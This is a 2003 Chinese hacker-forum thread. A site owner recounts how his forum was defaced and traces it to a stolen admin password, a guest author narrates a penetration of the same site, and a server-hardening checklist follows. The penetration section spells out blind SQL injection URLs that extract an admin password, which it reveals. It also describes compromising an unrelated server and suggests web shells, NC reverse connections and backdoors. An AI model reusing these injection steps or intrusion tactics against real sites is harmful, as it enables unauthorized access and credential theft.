剑客论坛被黑与孤独剑客谈黑客

  • 主题发起人 主题发起人 bye
  • 开始时间 开始时间

bye

新手上路
注册
2003-07-08
消息
243
荣誉分数
1
声望点数
0
发表:2003年11月15日
作者:孤独剑客
网站:http://www.janker.org
发布:http://www.hackbase.com

2003年11月15日(星期六)上午9点左右,仍在睡梦(我的爱好之一:)中的我突然被手机声唤醒,原来是《黑客X档案》的主编zero给我打来的电话,说我论坛的页面被改了,按照常理说,我应该很吃惊的,毕竟在国内很多人对我的站点虎视眈眈啊,记得很多黑客爱好者新手对我说过:“将来我一定要打败你!”,我一般都乐呵呵地回答:“我相信你一定能做到!但你必须付出努力”,这是可以理解的,长江后浪推前浪,江山代有才人出嘛!而事实上我对此一点都没有感到吃惊,这就让很多人会感到奇怪了,你作为国内知名的安全专家,自己的网站页面被改,这么没面子的事,你咋能这么耐的住呢?这要听我慢慢说来。


关于我的历史我不想说太多了,自从2000以来,我就在专业安全公司为国内的企业提供安全产品和服务了,更多的时间投入到了项目管理和新产品的设计研究上,所以,近两年来我也很少写文章和出软件作品了,就是有一些也是很业余的,甚至粗糙,其实根本原因就是因为工作太繁忙,这是没办法的事情,生存第一嘛!其实更重要的是,作为公司的技术总监其责任要远比一名安全爱好者要多的多,要负责公司安全服务体系的设计,不了解国内外的安全标准行吗?要负责安全项目的组织和管理,不学习项目管理可以吗?要负责产品的设计和规划,不研究产品技术和原理行吗?... 人的精力是有限的!白天我把自己的时间几乎全部用在了工作上,只有夜晚属于我的,才得以和朋友交流最新的安全漏洞和技术等,但除去睡眠时间,可用的太有限了!

剑客站点是我从1999年10月1日做起来的一个个人站点,最早就是为了发布一下自己的文章和作品,但后来因独特的个性和实用的内容逐渐被朋友们所喜爱,每天的PageView达到了几万次,成为了大家交流技术和生活心得的一个场所,根据需要从2001年起我为之单独租用了服务器,增加了技术文章、常用软件、作者专栏和论坛社区等栏目,以期望大家有更好的交流场所,但由于投入的资金不可能太多,所以服务器的带宽很窄,窄到什么程度呢?我专门做过测试,也就是说用1台ADSL拨号的电脑使用SYNFlood攻击就可以导致服务器停止提供服务。这是没有办法的事情,因为毕竟资金有限,剑客站点作为一个全免费的基本不做广告的站点,却拥有独立的域名和服务器,这对于很多网站而言已经很不错了,并且剑客站点还在可承受的范围内为一些朋友提供50M以上的免费Email。

在网站栏目的扩展和大家享受更多免费服务的同时,剑客网站的安全风险也在增大,做为安全技术人员,我很早就意识到了这点,事实上剑客网站采用了网上常见的免费文章系统、下载系统和论坛系统等,大家也都知道这些脚本程序的代码量很大,里面存在很多编码不严谨的地方,经常是堵了老漏洞又出了新漏洞,我不可能为自己去写这些系统,也不可能把它们的代码统统去检查一遍,根本原因是我的业余时间太少了,我曾经尝试做了一些,但一个星期也就才修改了很少一部分,实在太有限了,所以就放弃了。


记得在过去,大家研讨黑客技术都是以取得对方系统的管理员权限为目的,现在不同了,有些人把更换对方的页面做为目的了,就象是敌我双方打仗一样,常规的判定打胜对方的标准是控制对方的阵地并俘虏对方的士兵,但现在被这些人换成了只要能偷偷潜入对方阵地,贴上一个“这里被我占领了!”的纸条就算胜利了,这不是有掩耳盗铃、自欺欺人的意味么?


事实是:剑客站点经历了无数次的攻击,但至今没有人获得管理员权限!


实际上,剑客站点完全可以做的非常安全,那就是把全站做成静态页面或者是亲自编写严谨的脚本系统,但是选择前者的话,大家交流的场所就失去了,这是可悲的,若选择后者由我本人来做是不现实的,其实最好的就是关闭站点,这样对我的名声上可能会很有好处,但大家也就永远的失去了这样一个交流的场所,我想这是剑客200万以上的访客和近2万的论坛用户所不愿看到的,因此,我选择了面对风险,在系统级做了安全处理后仍然保持网站开放,但仍然面临着应用层次的攻击... 并且由于仍然是时间问题,网站的管理一直由onebull、开心、孤独侠客和水晶等朋友维护管理。

今年5月份N.E.V.E.R朋友在黑客基地(www.hackbase.com)发表的文章《我是这样渗透入侵孤独剑客网站(www.janker.org)的》,就暴露出了文章和下载系统存在的问题,经过他修改后在一定程度上起到了安全作用,但遗憾的是论坛系统并没有得到安全处理,其实论坛的问题早就存在了,在论坛的公告信息里面:

=================================================
祝今天参加程序员考试的兄弟们顺利过关!
发布人:孤独剑客 发布时间:2003-10-12 19:37:55
=================================================

这消息不是我发布的,后来一位朋友在QQ上告诉我是他发的,我说谢谢他免费管理!是的,我的确没有更改,甚至由于不是恶意的,连删除都没有做,自然也没做什么处理,也就是说漏洞依然。


大约从今年7月份开始,随着用户量的增加,很多用户反应论坛速度越来越慢,这时候“黑客基地(www.hackbase.com)”为我提供了高速空间,于是我就把bbs.janker.org放在了它们的服务器上,并由它们负责管理和维护。其实几个月以来,剑客网站(www.janker.org)经常被DDoS所攻击,一直到最近北京下了场雪后,机房光纤被压断,导致连续几天无法访问,当时我刚好也在出差在外,没有办法,等光纤恢复后服务器因为连续运转了两年多硬件又出现了故障,一时无法恢复,所以我干脆把www.janker.org指向了bbs.janker.org,以便大...某某女孩以展示其黑客水平,那么这种所谓的黑客技术果然值得炫耀吗?让我们分析一下其黑客过程。

1、从我的论坛最下方的“? 1999-2003 孤独剑客 感谢Rick提供”,判断出本论坛是“极限论坛”。
2、使用目前流行的SQL注入攻击方法获取论坛管理员“孤独剑客”或“开心”的密码。
3、通过http://bbs.janker.org/admin进入管理页
4、更改页面所有的颜色为黑色!(这里主要是隐藏其换不掉的部分)
5、更换论坛的logo图片地址为http://xxx/2003111535275752.jpg (这就是替换的页面其实就是一个大图片)
6、删除所有的栏目和数据(最卑鄙无耻的行为!确保首页无法替换的部分最少)
7、删除所有管理员用户(以达到延迟发现后页面恢复的时间)

从上面分析可以知道,除了发现极限论坛的SQL注入漏洞有些技巧以外,没有什么技术含量,并且这种漏洞已经出了很多,若用心的话,一个初中生完全可以做到,但并不是每个人都以这么无耻的手法去做,这就象杀人一样,大多数人都可以做到,若去战场杀敌,我们会称他为英雄,但若杀自己人,他就是罪犯,删除无辜数据更是真正黑客之大忌,为大家所不耻!

说到这次更换剑客论坛(bbs.janker.org)页面的styxfox,在不久前他更改华东师范大学主页的时候,我就想写篇文章发表一下感想,但仍然是工作繁忙无法静下心来整理思路,于是就拖了下来,今天就要说几句了。

从2001年的中美黑客大战的红客联盟出现和媒体不断的炒做后,国内黑客界就有一种趋势,可以说是一种可怕的趋势,那就是有些人为了出名,什么都敢做,不管道德,不顾法律!敢做其实并不可怕,关键是你用在何处,你真能把日本右翼的网站、******的网站或者是分裂分子的网站黑掉、Format掉也就是了,大家都会为你叫好!遗憾的是他们做不到,贫乏的知识和能力注定了他们做不到。因此他们就把目标转向了国内网站,使用那些自动化的黑客工具或技巧,黑到谁算谁,于是一批这样的网站就遭殃了,华东师范大学的主页就是一个牺牲品,再就是利用一些国内黑客站点没有自己独立服务器无法控制安全的因素,攻击这些站点,于是红客联盟、黑白网络、牛族、小凤居等就遭殃了,那么对付换不了页面的怎么办呢?于是就DDoS,于是天天安全网、剑客网站、安全焦点就无法访问了,甚至嚣张到其他论坛大发言论“xxx站被我黑了”以希望出名... 遗憾的是知道真相后大家对他有的只是鄙视。


就目前而言,为出名而丧失道德的这种趋势有增无减,曾有不少人在QQ中问我:“我技术比红客联盟的lion强多了,为什么我就没他出名?”,我无语!同时也感到悲哀,媒体的导向害了一批人。想想我的好友冰河、FZK、小榕、GoodWell、天行、PP等,他们不是系统和管理专家就是编程高手,个个身怀绝技,若他们以那种道德沦丧的方式乱黑网站的话,只需一夜整个网络肯定能闹翻了天,但请你们看一看在国内那个被黑的国内网站上看到过他们的影子,你们所能看到的就是他们的编写的黑客软件在国外被所广泛使用并倍受赞誉,你们看到他们留名的地方都是国外反动分子的网站。

去年我曾为《黑客X档案》写过“为黑客正名”的序,呼吁国内不要再糟蹋黑客这个神圣的词语了,但遗憾的是在国内仍然不少人在肆意的践踏,记得国内有位程序员朋友曾写文章试问国内的所谓黑客,“你没上大学可以原谅,但你读过几个RFC?TCP/IP网络7层的准确名称是?Windows真的很简单?Unix你知道多少?确信会用c写程序?... ”,不想再说了,只是想忠告那些急于成名的伪黑客,醒醒吧!好好学习,学真的本事,把你的安全技能用于为国内企业提供安全服务,以捍卫祖国的网络长城,这才是人生价值最有意义的体现,否则等待你的也许将是冰冷的铁窗生涯。


孤独剑客
2003年11月15日
网站:http://www.janker.org
发布:http://www.hackbase.com
 
剑客论坛被黑真相:管理员开心密码失窃

时间:2003年11月16日
作者:孤独剑客
网站:http://www.janker.org
发布:http://www.hackbase.com

我昨天发布《剑客论坛被黑与孤独剑客谈黑客》一文后,当天该文章以出乎意料快的速度在国内各大黑客安全站点被传播开来,真所谓是“好事不出门,坏事传千里”,并且此话题在论坛中被大量的评论,大家各抒己见,都发表了自己的观点和看法,有叫好的,有谴责的,有谩骂的,有无所谓的,一派百家争鸣的景象!
说真的,作为一个有血有肉有情感的人,我不可能对大家的评论无动于衷,至少我本人做不到,于是我仔细阅读了一些评论并做了大致的分析,主要分为三类,一类是赞同派,表示黑客道德规则还是要遵守的,反对利用掌握的黑客技术随意攻击国内的网站;一类是打击派,坚持被黑了就是技术不行和入侵有理的观点,甚至是直接的人身侮辱;再一类是中立派,就是不发表倾向性的言论。

在这里我只是想把事情的真实经过给大家说一下,有兴趣的朋友可以继续评论,我仍然会看的,对于思考分析后发表言论的朋友,我欢迎你,对于不谈内容只进行人身攻击的人,我鄙视你!下面我把剑客网站的详细情况给大家介绍一下:

我的网站内容主要分为五个部分:剑客、文章、软件、论坛和专栏,剑客栏目主要放置我个人撰写的技术文章和开发的免费小工具;文章栏目主要放置摘录的各种黑客安全类技术文章;软件栏目放置各种常用工具和黑客攻防类软件;论坛用于剑客网站的技术交流和心灵沟通;专栏放置一些朋友提供的技术类和安全类文章。整个网站拥有独立的域名www.janker.org和独立的主机服务器,服务器操作系统用的是Windows 2000服务器版,2M共享的网络带宽,论坛采用的是极限论坛(ASP脚本),采用的后台数据库是MSSQLServer,其他栏目用的是集成在一起的突围全站程序(ASP脚本),采用的数据库是MSAccess。

作为一个全免费的个人业余站点,我建设的目的是发布一些自己的作品并提供一个和朋友们在网络上交流沟通的场所,但不知道一些人是出于什么意图,www.janker.org经常会遭受到DDoS攻击,一般来说,持续时...负载均衡设备和购买反DDoS的防火墙等,目前我所能承受花费仅限于2M带宽和一台主机服务器。


剑客网站做了必要的系统安全处理,主要是对Windows操作系统自身做了安装补丁、权限设置、注册表修改、端口过滤等安全强化措施,在这里不在一一累述,而对于代码庞大的突围和极限ASP脚本,我不是完不成,而是根本没有时间去逐一去阅读代码并做安全修订,我想熟悉编程的朋友肯定都会知道,你要想完全修订别人的程序,和你自己去的的工作量差不了多少的,所以我不是没有尝试去做,而是做了没完成就放弃了,事实上,突围程序我增加了一部分安全检查代码,因工作量太大,放弃了,结果后来N.E.V.E.R就发现了其他地方的SQL注入漏洞并帮我做了比较全面的修补,极限论坛程序我也增加了一些安全检查代码,但也只是一部分,所以我承认对于没有修订的部分我没信心是否会存在安全隐患,并且事实证明隐患很可能是存在的,因为10月12日有朋友通过管理员用户“孤独剑客”发布了一条“预祝兄弟们心想事成~~~ ”的公告,我的确看到了,因为考虑到其没有恶意和我出差在外不方便上网等因素就没有去处理,后来他通过QQ告诉我说是他做的,我就说那你帮我管理论坛好了,因为我的确没时间经常去管理,******经常去捣乱,论坛的确需要管理,同时这也反映出了我对自己网站的忽视,毕竟人的精力是有限的,在全力保护自己的网站和保护客户的网络之间我选择了后者,但我没想到事情发生后会发展到出现了“自己的网站都管不好还给别人做什么服务”的言论,这使得我认识到了自己网站的重要性,决心以后采取措施做好安全防范,不掉以轻心,这么多人关注我的网站的确出乎我的意料。


剑客论坛被黑的真正原因是因为管理员密码失窃。剑客网站的管理员分两类,一是突围系统管理员,一是论坛系统管理员,只要掌握了管理员的密码,就可修改相应的页面,突围系统的管理员有孤独剑客、水晶和才鸟等,论坛管理员有孤独剑客和开心,其中开心和水晶分别负责管理论坛和文章,并且均服务了半年以上时间,在QQ上和我非常熟悉,对网站的维护管理也比较尽心。论坛页面被改后,我分析了被涂改的页面发现论坛首页文件index.asp内容没有任何变化,只是调用了被修改了的数据库,而修改数据库只需要破解管理员密码就可以做到,基于操作系统系统自身做了安全加固的考虑,获得系统的管理员权限是非常困难的,并且检查后没有这种迹象,因此我想到的最有可能是SQL注入攻击,很多这类攻击实例表明通过这种手法获得管理员密码是很容易做到的,于是就写了“剑客论坛被黑与孤独剑客谈黑客”一文,但该文提及的SQL注入攻击获取管理员密码我当时没有来的及重现,因为当初考虑到性能因素禁用了服务器上的日志功能,所以无法从服务器上了解到其攻击过程,重现的过程也需要时间去发现。然而后来听说这几天水晶和styxfox住在一起的事情让我感到有些不对劲,因为论坛被涂改的日子是15日,而在13日水晶曾要求做我论坛的管理员,我当时毫不犹豫就同意了,这可以参见文后我与水晶在QQ上的对话记录。由于当时上班时间所以话也简短,并且后来我问水晶情况他告诉我曾把文章管理员用户“水晶”的密码给过styxfox,他进去看了看,但他说他在论坛的管理员用户名是★水晶★,并且密码和文章管理员不同,我对水晶是信任的,毕竟他是我很熟悉的朋友了,但我不能保证他和styxfox在网吧一起上网的时候是否不小心密码会泄漏,但水晶给我说后来他连续在网吧上了两天网,没有styxfox在一起,等他回去睡觉醒来后这事情就发生了,但他给我提供了一个信息那就是styxfox曾经利用直接下载MDB数据库得到过开心网站(www.xuemeng.com)的管理员密码并做过涂改,因此和开心吵过架,我把此事和开心印证后果然开心在他的网站和我的论坛的管理员使用了一样的密码,后来从styxfox口中也得到了印证,至此,剑客论坛被黑一事真相大白,但我想SQL注入攻击可能仍然会有的。

想说的是开心和styxfox都是才19岁左右,对黑客安全技术充满了憧憬,他们都有着初生牛犊不怕虎的傲气,是可喜的事情,但他们自身的学习经历和经验决定了他们基础知识的薄弱和看问题的不全面性,所以难免会发生一些令人不愿意看到的事情,其实这里面关键是一个引导问题,尤其是媒体的导向,对于他们的成长非常重要,事情发生后开心很诚心的向我道歉,事实上我内心没有一点怨他什么,我对他说我们告诉大家真相就足够了,这也激励他以后更加努力地去学习,做好自身的安全防范,styxfox在看了我昨天发的文章后,也主动找我谈话,明确地承认了错误,向我表示了歉意,我认为这都是非常好的现象,并且我相信这次事件在styxfox的人生路途中可能会成为一个转折点,并且警示了正打算搞恶意攻击而可能走向危险道路的青少年们。


在网上见到有朋友说我以前是黑客,现在做白客了就去贬低和打击那些黑客新手,我想你是错误的,至少你没有和我深入接触过,首先认真读过我昨天的文章的人就会明白我并没有谩骂,只是对当前为出名而不顾道德乱黑网站趋势的严厉谴责,这是我积蓄了很久要说的话,同时也为国内的黑客发展感到悲哀,是一种无奈的呼吁。也有不少朋友说我为人比较高傲,我想这也是对我的误解,可能主要是我忽略了这些朋友通过EMAIL和QQ与我的沟通,但对于这点,就是现在我也无法做到,因为对我来说工作是首位的。对于有朋友说我以前乱黑网站一事而不顾道德一事,我想声明一点,我从来不认为自己是黑客,只是认为那是一种境界,你也许一直在努力,但你始终达不到,并且在过去我始终坚持有我的原则,只动国外反动势力的网站,对于国内的要么是出于保护目的,要么是不予理会。

最后想说的是,感谢朋友们对剑客网站多年以来的支持和关爱,在不知道不觉中剑客网站伴随你们度过了四个春秋,无数个日日夜夜,在安全类的个人网站中依然屹立着,很久以来剑客网站已经不仅仅是剑客的个人网站了,而是广大和剑客有着一样梦想的朋友们共同的网站,经历这次洗礼后,剑客网站近期将进行重新建设,加强管理,在确保安全的前提下为大家提供一个更加美好的安全技术和心灵沟通的网络空间。若您有好的建议和想法,或者能提供充足的网络带宽或服务器,请和我联系,我的QQ号码是5385757,谢谢!

附:孤独剑客和水晶的QQ对话记录
=================================================================
(2003-11-13 (14:37:54) ★水晶★
HOHO 在不?
(2003-11-13 14:33:14) 孤独の剑客
你hao
(通过服务器中转)
(2003-11-13 14:41:23) ★水晶★
HOHO 最近我有时间 几乎24小时在线
我帮你管论坛吧?
(2003-11-13 14:35:10) 孤独の剑客
好啊
(通过服务器中转)
(2003-11-13 14:39:17) 孤独の剑客
http://bbs.janker.org/admin/

你现在临时是系统管理员了, 可从这里直接删除那些******的帖子和id

但一定不要乱删除合法用户!
(2003-11-13 14:47:02) ★水晶★
当然了 这个我知道滴
谢谢剑客的信任啊 呵呵

(2003-11-13 14:40:16) 孤独の剑客
好de
(通过服务器中转)
(2003-11-13 14:47:24) ★水晶★
好拉 你继续忙吧
(2003-11-13 14:40:37) 孤独の剑客
bye~~
(通过服务器中转)
 
我是这样渗透入侵孤独剑客网站(janker.org)的

作者:N.E.V.E.R
日期:2003年5月22日
出自:http://www.janker.org

不成功的入侵还是有点借鉴价值的,我想同样的方法换一个地方的话,说不定就成功了。
目的地是www.janker.org,呵呵,应该算是授权了的吧。传说中的黑客叔...不过实在太远,买车票过去的时间说不定我都可以打一把Windforce了,还是来点远程的吧。
拿出扫描器甲乙丙丁一阵乱扫,呵呵,结果大家都能猜到,就不废话了。反正80和23是开着的,这个结果要记住。
系统漏洞没有的话,有几种方法可以供选择:1、渗透;2、脚本漏洞。当然,还可以玩D.D.o.S,还可以背上炸药包炸主机,还可以用拖网把电缆弄断,还可以开飞机把那栋楼撞了,等等。当然这些要看攻击者的想象力,我还是老老实实的看脚本。
找啊找啊,找了几秒钟,找到一个地方没有很好的处理参数id。http://www.janker.org/show.asp?id=2;--出错了。“Microsoft JET Database Engine 错误 '80040e14' 在 SQL 语句结尾之后找到字符。”嗯,大虾们肯定已经看出来了吧?我想来想去觉得这句话告诉了两件事情:一、用的是ACCESS数据库;二、脚本里面兴许有什么" where id=" & request("id")之类的没有过滤的洞洞。关键是怎么用呢?
我还是决定像瞎子摸象一样再看看,猜了一会儿后,觉得一个发布系统远程总会有一个管理系统吧,猜猜表名看看。http://www.janker.org/show.asp?id=2 or id in (select id from admin)
OK,没有报错,那么说起来存在一个admin的表,而且这张表里面有id项,其实后来想想这样不好,子查询只是要确定一下有没有admin这张表,用..... id <> (select count(*) from admin)比较好。
继续猜,猜了几个常见的列名,嗯,得到的结果是有user,password。到这里的时候,我觉得我走了很多弯路,虽然第一直觉是这是一个免费的公开源代码的东东,但是因为一下子我没有认出来是什么(我看过的东西很少啊,呵呵……),就没有去找下载,现在猜得头晕,觉得还是应该去找代码来看比较好。
于是我的方向又转到如何去找相同的东东。呵呵,很笨的,我想到了在google.coms搜索fir.asp,因为fir.asp是很奇怪的一个名字,结果我找到了很多很多相同的站点。我觉得几千个结果里面总有非常容易入侵的机器吧,嗯,我用的是webdavx3,大约失败60次以后,终于找了一个进去。当然啦,我只是要看看代码,没有别的意思,只是在这台机器上装了socks5代理(呵呵),补上漏洞就出来了。
这个时候已经临近熄灯时间,我就干脆断了网看代码,嗯,应该说是看那个Access数据库。早这样的话,我就会少走好多弯路啊,不过猜猜也很有意思,大脑长期不用会生锈的。
有人想到直接下数据库吧?呵呵,哪有这么容易的事情啊,数据库的名字百分之一百二被改掉了。
嗯,反正我已经知道admin表是怎样的了,猜猜密码也还不算是太累的工作。先看看admin里面有几个管理员。
http://www.janker.org/show.asp?id=3 AND 1<(select count(*) from admin)
嗯,比一个多……
http://www.janker.org/show.asp?id=3 AND 10<(select count(*) from admin)
没有十个……
(省略无聊过程若干)
http://www.janker.org/show.asp?id=3 AND 5=(select count(*) from admin)
有五个管理员呢,随便找一个破一下啊……
我选的是id=1的,我先猜的是它的密码第一位,呵呵,密码总要一位一位的猜嘛……
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left(password,1)='q')
嗯,显示是“未指定所需参数!”那么第一位不是q了,如果我们提交的SQL查询正确执行--也就是我们猜对了的话,是会出来id=3的那篇文章的(前面的那些也一样)。继续来吧……
w、e、r、t、y……猜了一会儿,结果出来了。
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left(password,1)='j')
显示了id为3的那篇文章,密码第一位为j。
暂停一下,如果密码有个2、30位的话,岂不是要猜死了,先看看密码有几位再说吧。方法和猜管理员的个数是一样的,直接给出结果
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where len(password)=7 and id=1)
7位,刚好在我的心理承受范围之内,8位以上的话就要考虑写程序猜了。猜测的过程是美好的,你看到第一位是j后会怎样想呢,优先猜的肯定是a、A、4、@、k之类的吧?如果你猜到了前面三位是jk2,后面的00也会很自信的写上去吧?最后的密码是jk2008!,呵呵,如果你在30分钟内没有一位一位的猜出来的话,就不要做hacker/cracker了。还是给出过程:
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left(password,2)='jk')
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left(password,3)='jk2')
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left(password,4)='jk20')
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left(password,5)='jk200')
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left(password,6)='jk2008')
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where left(password,7)='jk2008!')
嗯,大家在考场上有没有掷色子做选择题的经历啊?一般都是扔两次吧,呵呵,验算一下也是很必要的哦。顺便把用户名也猜出来了……
http://www.janker.org/show.asp?id=3 and 1=(select id from admin where password='jk2008!' and name='janker')
经过一番捣鼓,我终于得到了一个用户名/密码,嗯,很费工夫吧?费工夫的还在后面呢,还有四个用户可是等着我们猜的。当然,全部得到我想要的东西时,已经是第二天的事情了,至于用户名密码,我就不说了,我只是说过程嘛……
然后干什么就是定式了吧?我选择的道路是先进入管理界面发布两条搞笑的消息,然后说不定有什么跨站脚本漏洞,新闻是显示在首页上的,没有过滤html字符的情况下,你可以想办法建一个1600x1200的div,背景色设定为黑,真正把它“黑”掉。或者刷新到你自己伪造的页面上,等待那些习惯从首页登陆的同志们的密码,哈哈哈哈……一切都很顺利,不是吗?可是管理界面在哪里呢?
http://www.janker.org/admin/
该页无法显示,faint!原来把管理的路径改了……这不是耍我嘛,搞了半天,做的都没有用嘛……
嗯,还有一个办法的,呵呵,要不然太没有面子了。我干嘛要把几个密码都破出来啊,不就是想多一条路吗,还有FTP呢。呵呵,我记得在哪里看到说很多人都是用的一个密码,试了一下,有一个果然进去了。
GAME OVER!故事到这里就结束了。呵呵,没有成功吧,因为我已经累了,而且觉得很无聊啊,更加重要的是Janker告诉我有人以前用相同的方法得到过密码,我想建设永远比破坏困难,而我比较喜欢困难的事情。
如果要继续的话,故事也许会是……
完美结局一:
上传的目录可以执行脚本,于是上传了一个.asp的SHELL,然后上传NC一类的东西反向连接,提升权限,清除脚印,安装后门,KO。
完美结局二:
上传的目录不可执行脚本……怎么办呢……
上传了一个精心制作的folder.htr和desktop.ini,几天后,通过某不知名的木马的客户端连接到了那台机器。
完美结局三:
……
或许你还可以想出这样那样的完美或者是不完美的结局、然而真正的结尾只会有一个。对于管理突围(后来我知道这个系统的名字叫作管理突围)--一个2001年的作品,没有什么好说的。可是用这个的www.invchina.com、www.cnftrade.net、www.zgwl.net、www.manage.org.cn,还有那些用其它免费脚本的那些网站,不自己看看代码,你们真的能放心吗?
===========================================

===================

附孤独剑客先生的评语:

本人的个人站点(http://www.janker.org或http://janker.126.com)做为国内的知名的安全

技术交流站点之一,自从1999年10月1日建立至今,访问量已达160多万人次,长期以来,一直为大

家提供免费技术资料和技术交流沟通的场所,但由于其在国内安全界的特殊地位,很多安全爱好者

把本站当作了挑战目标也在情理之中,从日志分析可以看出janker.org经历了超过10万次以上的尝

试入侵,经受了多次DDOS攻击,但到目前为止,尚没有人能够实现更改网站首页或获得管理员权限

,在此我把管理维护经验和大家做一下交流,分析内容见下:

(1)N.E.V.E.R成功破解文章管理员密码的过程分析

我的站点很久以来一直是采用静态页面的方式,尽管这样做站点会更安全,但却更新麻烦交流不方

便,不能够为大家提供更及时的技术服务,加上本人工作繁忙,不可能把很多精力投入到这上面来

,所以就采用了折中的方法,那就是使用免费的文章和下载及论坛系统,尽管我对服务器本身做了

标准的安全设置和处理,但不可能是去阅读上万行的第三方代码,要求一般的脚本程序员写出安全

的代码也不太现实,N.E.V.E.R正是利用了脚本代码对页面提交的变量(GET或POST)检查不严而嵌

入了非法的SQL查询,从而可以非授权访问数据库的内容。事实上,在此之前已经有一位QQ上的

叫.PsKey的朋友利用此方法猜出了密码,由此可见注入SQL查询攻击已经为多人所掌握,并且在防

火墙和反病毒软件已经为基本安全配置的如今,脚本攻击将会长期存在下去,而成为影响网络安全

的一个重要因素,就目前而言,防范的主要方法为编写安全的脚本代码和设置安全的服务器系统。


(2)N.E.V.E.R没能够实现更改网站首页的原因
要实现更改首页内容,可从两个方面入手,一是直接修改首页文件,二是修改数据库内容,因为首

页调用了数据库的一些数据。对于前者由于首页文件设置了只有系统管理员才有写的权限,其它用

户都是只读权限,所以在没有获得系统管理员权限的情况下,想更改是几乎不可能的;对于后者而

言,由于数据库文件和首页文件设置了相同的权限,所以可能性不大,也许有的人会问那怎么更新

,其实方法很简单,那就是需要更新的时候先设置一般用户对数据库文件可写,更新完毕再设置成

只读,虽然麻烦了但却增加了安全性。并且,若不能够进入文章管理界面的话,即便拥有用户账号

和密码要实现修改数据库也是比较困难的,当然若有人乐意为我修改为安全代码的话,可能会为我

省去这麻烦,但可能省不去的是仍然会有被同样手法攻击的可能,因为修改者也无法保证他修改后

就一定安全了,毕竟新的不安全因素是潜在不可预测的。


(3)N.E.V.E.R很难在janker.org上实现权限提升的依据
权限提升的方法有很多种,但不外是漏洞利用、密码破解和欺骗伪装等手段,只要安全处理得当,

实现起来也并不容易,janker.org是通过以下处理来保障服务器安全的。
1、系统和应用软件均保持安装了最新的安全补丁程序。
2、去掉了服务器中不必要的服务和软件系统并设置了严格的文件目录和用户访问权限。
3、系统中没有无用的用户账号存在,且设置了复杂密码。
4、利用系统自身的端口过滤功能封闭了不必要的端口,并禁止不必要的外连。
5、安装有自动更新功能的反病毒软件。
6、安装有进程监控软件,除设定的程序外其它任何程序均不允许在系统中执行。
7、设置了所有的网站目录为系统管理员可读写,普通用户只能读取。
8、网站中所有通过WEB可上传文件的目录均不允许执行脚本和程序。
9、为朋友免费提供的FTP空间通过HTTP访问均不允许执行脚本和程序。
10、我的习惯是以普通方式而不是Web方式浏览服务器文件夹,显示所有隐藏文件和扩展名,不直

接打开可疑程序。

当然,除上面的以外还做了更多的细致设置,比如:服务器伪装、限制FSO和SHELL、设置特殊文件

权限等等。

总结,通过N.E.V.E.R的这次渗透入侵,可以看出我本人作为一名专业的安全人员,能够做如

此细致的安全设置是可以理解的,但相信大多数安装了防火墙和入侵监测及反病毒软件就认为高枕

无忧的网络管理员可就需要注意了,脚本的安全问题已经成了你安全防御线上最薄弱的一环,严重

的话通过权限提升可以轻易获得系统的管理员权限,但也可以看出只要服务器自身的安全处理得当

,避免某些不可预料的安全问题是可能的。

致谢:

.PsKey - 是他最早告诉我站点使用的突围文章系统(www.laoji.com)存在脚本安全问题,并查

出了文章管理员的密码,记得日期是2003年3月26日,是他促使我更改了管理脚本所在目录的路径

,提高了安全性,遗憾的是我仍然没有时间去好好读读代码,真是不到黄河不死心啊 :)。PsKey

朋友的qq是123935563,有兴趣的与他联系。

N.E.V.E.R - 是他再次提供了友情渗透并替我修改了程序的代码,增加了代码的安全性,使得

janker.org能够更好地为大家服务,他的工作省却了我去修改那些代码的时间,衷心谢谢他!特别

指出的是,此外N.E.V.E.R还曾为新兴的大型安全站点“黑客基地”-http://www.hackbase.com,

做了友情渗透并修订了不安全的脚本代码,发扬了真正的黑客精神,值得大家学习,这也鞭挞了那

些只会拿现成工具去乱改页面而不知道维护网络安全的伪黑客!N.E.V.E.R的qq是1143431,有兴趣

的话大家也可以和他联系。


最后感谢所有支持、关心和爱护孤独剑客站点的朋友,没有你们,我的个人小站不会办到今天

,有了你们它才在四年多以来以其独特的氛围吸引着一批又一批的安全爱好者!谢谢。


孤独剑客
2003年5月22日
http://www.janker.org
qq:5385757
 
我diu啊
PsKey又出现了
必须请客,我这就找他去
 
后退
顶部